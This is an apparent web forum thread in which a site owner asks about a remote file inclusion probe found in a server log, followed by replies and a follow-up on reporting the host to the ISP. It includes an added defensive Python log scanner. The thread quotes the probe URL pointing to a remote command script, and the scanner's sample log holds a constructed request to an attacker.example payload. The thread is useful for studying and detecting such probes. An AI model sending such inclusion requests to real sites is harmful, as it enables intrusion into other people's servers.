  1. #1
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524

    Is This an XSS Attempt?

    I noticed an interesting entry in my server log today, thankfully a 404:
    Code:
    /search.php=http://hux0x.topcities.com/cmd1.txt
    I checked out the URL, and it looks like someone is being a very bad boy.

    I assume this is an example of a cross-site scripting attempt? Is it possible they would have gotten anywhere with this script if I had register globals turned on? Do you think it would do any good to report this activity to this person's ISP?
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web
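
An added example (not part of the original thread or any poster's code): a small log scanner for requests shaped like the one quoted in post #1, where an absolute URL is handed to a script as a value, the shape usually associated with remote file inclusion probes against PHP scripts. The client addresses, timestamps, the second and third request lines, and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# An absolute URL appearing after '=' in the request target, i.e. a URL
# passed to the script as a value rather than a normal relative path.
REMOTE_RE = re.compile(r'=\s*((?:https?|ftp)://[^\s&"\'<>]+)', re.I)

def decode(target, rounds=3):
    """Percent-decode repeatedly so %3D and %253D forms of '=' are seen."""
    for _ in range(rounds):
        nxt = unquote(target)
        if nxt == target:
            break
        target = nxt
    return target

def find_remote_url_requests(lines):
    """Return one finding per request whose target embeds a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, method, target, status = m.groups()
        hit = REMOTE_RE.search(decode(target))
        if hit:
            findings.append({
                "client": client,
                "target": target,
                "remote_url": hit.group(1),
                # A 404 means the probed script was not there; a 2xx means
                # the script ran with that value and should be reviewed.
                "needs_review": status.startswith("2"),
            })
    return findings

# Constructed sample lines. Only the first request path comes from the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2005:10:01:22 -0700] "GET /search.php=http://hux0x.topcities.com/cmd1.txt HTTP/1.0" 404 312 "-" "-"',
    '203.0.113.7 - - [01/Jan/2005:10:01:25 -0700] "GET /index.php?page%3Dhttp%3A%2F%2Fattacker.example%2Fcmd.txt HTTP/1.0" 200 5120 "-" "-"',
    '198.51.100.4 - - [01/Jan/2005:10:02:00 -0700] "GET /search.php?q=vinyl+records HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_remote_url_requests(SAMPLE_LOG):
        print(finding)
```

Legitimate parameters that carry absolute URLs (redirect targets, for instance) will also match, so treat findings as leads and look at the 2xx ones first.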

  2. #2
    ********* Wizard silver trophy Cam's Avatar
    Join Date
    Aug 2002
    Location
    Burpengary, Australia
    Posts
    4,495
    This is probably better suited to the security forum.

    Yeah for sure report them to their ISP!

  3. #3
    With More ! for your $ maxor's Avatar
    Join Date
    Feb 2004
    Location
    Scottsdale, Arizona
    Posts
    909
    BWAHAHA

    This part was very funny to me...
    Linux Local Kernel Exploit copiado com sucesso
    Stupid script kiddies

  4. #4
    SitePoint Enthusiast
    Join Date
    Jul 2004
    Location
    Massachusetts, US
    Posts
    76
    It looks as if the person is trying to find an exploit to use search.php as a proxy.

  5. #5
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Just a follow-up on this thread. I filed an abuse report with this person's ISP a few weeks ago. I checked on their site just now, and a page comes up that says the site is temporarily unavailable, either because they don't have an index.html page (which they are required to have for a free account), or they have been suspended because they are over their bandwidth limit.

    Personally, I don't care what the reason is, just so long as they're shut down.
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

